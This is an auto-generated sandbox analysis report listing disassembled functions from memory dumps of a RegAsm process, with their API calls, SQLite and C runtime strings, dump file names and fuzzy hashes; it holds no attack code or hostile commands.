Instruction Fuzzy Hash: C941AD71E04219EBCB14DF94DC01BAEB7B8AB44B14F10426EF915B72C0DBB86905CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B831 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041B83D

Part of subcall function 0041BA14: __getptd_noexit.LIBCMT ref: 0041BA17
Part of subcall function 0041BA14: __amsg_exit.LIBCMT ref: 0041BA24

__getptd.LIBCMT ref: 0041B854
__amsg_exit.LIBCMT ref: 0041B862
__lock.LIBCMT ref: 0041B872
__updatetlocinfoEx_nolock.LIBCMT ref: 0041B886

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 5c3cacb0f7ad1bba531c55489a9aabdf1faedfa9b12995f3489998ccd8b0754d
Instruction ID: 838ad8bec1577741fb6ee50676f92d0b4110c482cf9a1a1505d817c5540a6f99
Opcode Fuzzy Hash: 5c3cacb0f7ad1bba531c55489a9aabdf1faedfa9b12995f3489998ccd8b0754d
Instruction Fuzzy Hash: 8AF062319417109BDA10BB666803BCE6290EF00B68F10421FE450672D2CB3C49C1CADE

Uniqueness

Uniqueness Score: -1.00%

Function 1C267D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

winShmMap2, xrefs: 1C267E1F
winShmMap1, xrefs: 1C267DC5
winShmMap3, xrefs: 1C267F1D

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 0-3826999013
Opcode ID: b4587d683b5ae0472206bdb814b8f2c52e835a0129c95a46ad789ff1632324ee
Instruction ID: 8e4cb3d8b3262a1c269c518005f7efce99c9e709202ddf70a30582be5995ad57
Opcode Fuzzy Hash: b4587d683b5ae0472206bdb814b8f2c52e835a0129c95a46ad789ff1632324ee
Instruction Fuzzy Hash: 0961D0B56043229FD714CF25D881E67B7F5AB88B00F20496DFD8297A51EB34E848CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1C2935E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C2935EA
misuse, xrefs: 1C2935F4
%s at line %d of [%.10s], xrefs: 1C2935F9

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 8dbde9a33390ac096efcbb51ff7c1952cac3bd2553044dab7aa3fbc4bd414938
Instruction ID: cc647e0ee0cc1f833051d371e4ca6bcbc992a833adf927829bfdd0b03d11e9f8
Opcode Fuzzy Hash: 8dbde9a33390ac096efcbb51ff7c1952cac3bd2553044dab7aa3fbc4bd414938
Instruction Fuzzy Hash: 5D5126F5A05322AFDB14CF15CC84A96BBA5FF04B34F155268F8199B252D331E814CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 1C3096B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C3097E0
%s at line %d of [%.10s], xrefs: 1C3097EF
database corruption, xrefs: 1C3097EA

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 753e26f50120b19a9b11901141a6e9c55928d9e2fbb7728db72c0960c604d1ea
Instruction ID: 1c46ce4e530a1042ceaee44106c2dcde1b2d396ff421392ad4b4ba010b869c76
Opcode Fuzzy Hash: 753e26f50120b19a9b11901141a6e9c55928d9e2fbb7728db72c0960c604d1ea
Instruction Fuzzy Hash: 7C4137772057D08FD3218F7CA440AD7FFE09F41622F1849AED2D58B652E222E4A5DB71

Uniqueness

Uniqueness Score: -1.00%

Function 1C3D5960 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C3D5976
misuse, xrefs: 1C3D5980
%s at line %d of [%.10s], xrefs: 1C3D5985

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 94562eafe19ae9fcec2adf2b64ff453f6e82b9efd9d0573b62c7fb4c99b5ebfc
Instruction ID: 64e2de0e624e1a7ce423f2f93d9ea90d16d06cab9543ec7b0124bbc37b0316ae
Opcode Fuzzy Hash: 94562eafe19ae9fcec2adf2b64ff453f6e82b9efd9d0573b62c7fb4c99b5ebfc
Instruction Fuzzy Hash: 3041EBB69053519FD311CA15CC80BEAB7E4BF85320FC50659F94457281E335E959CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1C377ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

error in tokenizer constructor, xrefs: 1C377F92
no such tokenizer: %s, xrefs: 1C377F1B

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: error in tokenizer constructor$no such tokenizer: %s
API String ID: 0-815501780
Opcode ID: 48cf378f4248bf5a07782bca3468a04e969fea00e98b02f3d010b81d64eaa0ac
Instruction ID: c286b8619ee9d06e48da5b5a0c710f9fe047d515e6209cc6683d273d488c744e
Opcode Fuzzy Hash: 48cf378f4248bf5a07782bca3468a04e969fea00e98b02f3d010b81d64eaa0ac
Instruction Fuzzy Hash: F331A1767013158FC722CF19D880BAAB3E4EF86665F25066DE988DB300E336EC05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1C29FD60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C29FDE6, 1C29FE61
%s at line %d of [%.10s], xrefs: 1C29FE82
database corruption, xrefs: 1C29FE7D

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 88bc2ac85e7fda34750f2bb48df29421c274a5bc62ba51a45dd4193f12087648
Instruction ID: c03e051041ddca73a5a08fc27fca18f10dcf099fdaaaf8e6cad6cf7b5eddfcb3
Opcode Fuzzy Hash: 88bc2ac85e7fda34750f2bb48df29421c274a5bc62ba51a45dd4193f12087648
Instruction Fuzzy Hash: 16312B686153918BD3648F24C4007A6BAA1BF15308F64C5DDE4458F763E37BC487DBB6

Uniqueness

Uniqueness Score: -1.00%

Function 1C2AD6F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

%s%s, xrefs: 1C2AD725

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%s
API String ID: 0-3252725368
Opcode ID: 22a4113550917483038455cdad8da0d140f3e7ce054a8e8f444755cb61f2730e
Instruction ID: 10b2dcfa8f08b7ef6a8a4128d07cb93014fb159cd7ebe3f67a242ebe17ff68f5
Opcode Fuzzy Hash: 22a4113550917483038455cdad8da0d140f3e7ce054a8e8f444755cb61f2730e
Instruction Fuzzy Hash: ED11DFB5A05231DBEB149F29DC88A9733B8FF84319F200125FA08D6200D735E505C7B3

Uniqueness

Uniqueness Score: -1.00%

Function 1C301F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

JSON path error near '%q', xrefs: 1C301F92

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: JSON path error near '%q'
API String ID: 0-481711382
Opcode ID: 489b3a07e92bd3b6031e3e43939603e4c0c38997177f62dc36b50b686fdab3d1
Instruction ID: 87fc4db138b63d719f255d60221db9cddb5c5d9c7a527a16ba0da96af3376958
Opcode Fuzzy Hash: 489b3a07e92bd3b6031e3e43939603e4c0c38997177f62dc36b50b686fdab3d1
Instruction Fuzzy Hash: A10104B26092116FDB249A94CC00BDB7BC4DF41320F20072CF895962D0DB72A81587F2

Uniqueness

Uniqueness Score: -1.00%

Function 1C261DF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1C261E53
misuse, xrefs: 1C261E59
%s at line %d of [%.10s], xrefs: 1C261E63

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 7d3ddabc548c31bd7202c2df925112f9ef7a59a743ab644a5650dc6b5d04c238
Instruction ID: bf77fd8ce346ffbc491b3fd2714ed6ad678127611d133ece7f947bda6a633acf
Opcode Fuzzy Hash: 7d3ddabc548c31bd7202c2df925112f9ef7a59a743ab644a5650dc6b5d04c238
Instruction Fuzzy Hash: 1C11E074B08AA1DFD714CE68D848E96BBB8AF46604F244459F905CB722C334F955C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 1C277F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 1C277F76

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
API String ID: 0-3072645960
Opcode ID: 8982c57ef6d57a5c7dc67b61346b0bb954242600f85808c2380d464381098048
Instruction ID: 972734e573715f091a67d7fe6b8c82681ba3fb99efbf528cd3dc2b337dae93e3
Opcode Fuzzy Hash: 8982c57ef6d57a5c7dc67b61346b0bb954242600f85808c2380d464381098048
Instruction Fuzzy Hash: 6FF0903A70830397E7119F69FC01BCAB7D5AFD1721F290679F94496290E770A88987B2

Uniqueness

Uniqueness Score: -1.00%

Function 1C277DA0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81cb98e5488686f0f9025ceb4f1cb2259956450e5551746a9555d57cf91a11c6
Instruction ID: 37bac8724bf368a127f36a78e26c1138f92b32a71e9faafe0bf919eb2e5e832c
Opcode Fuzzy Hash: 81cb98e5488686f0f9025ceb4f1cb2259956450e5551746a9555d57cf91a11c6
Instruction Fuzzy Hash: 1441FC766017029FE315CF19D980A52F7E0FF94724F20452EF94687A22D772F855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004105E0 Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410602
GetLastError.KERNEL32(?,?,00000001), ref: 00410610
GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410648

Part of subcall function 00411470: GetProcessHeap.KERNEL32(00000000,?,?,0041067B,00000000,?,?,00000001), ref: 0041147D
Part of subcall function 00411470: HeapFree.KERNEL32(00000000,?,0041067B,00000000,?,?,00000001), ref: 00411484

wsprintfA.USER32 ref: 00410692

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HeapInformationLogicalProcessor$ErrorFreeLastProcesswsprintf
String ID:
API String ID: 837085947-0
Opcode ID: 0d9c4edbb7559f74c35b9bd252e70d27db301ce926e9fbfe6edfc568aac6d805
Instruction ID: 366bb74dd286f18a7a484b3067aafd1d3a88729660cbb4a48cba89bc7db310ad
Opcode Fuzzy Hash: 0d9c4edbb7559f74c35b9bd252e70d27db301ce926e9fbfe6edfc568aac6d805
Instruction Fuzzy Hash: 69210676E02128A7D7209A59BC40AFF77A8EF82714F14017BFC08D7201D7798EE582D9

Uniqueness

Uniqueness Score: -1.00%

Function 1C44F4CA Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 1C44F4E0
GetLastError.KERNEL32(?,?,?,?), ref: 1C44F4ED
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 1C44F513
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 1C44F539

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 670fb3187c467741e8e8e8220a9650c127e7209cb59422902f7758fbd1448a52
Instruction ID: ae1f1489d1b9651e34014acfc9bcbd75f2448749e98eaec2ab69319728323782
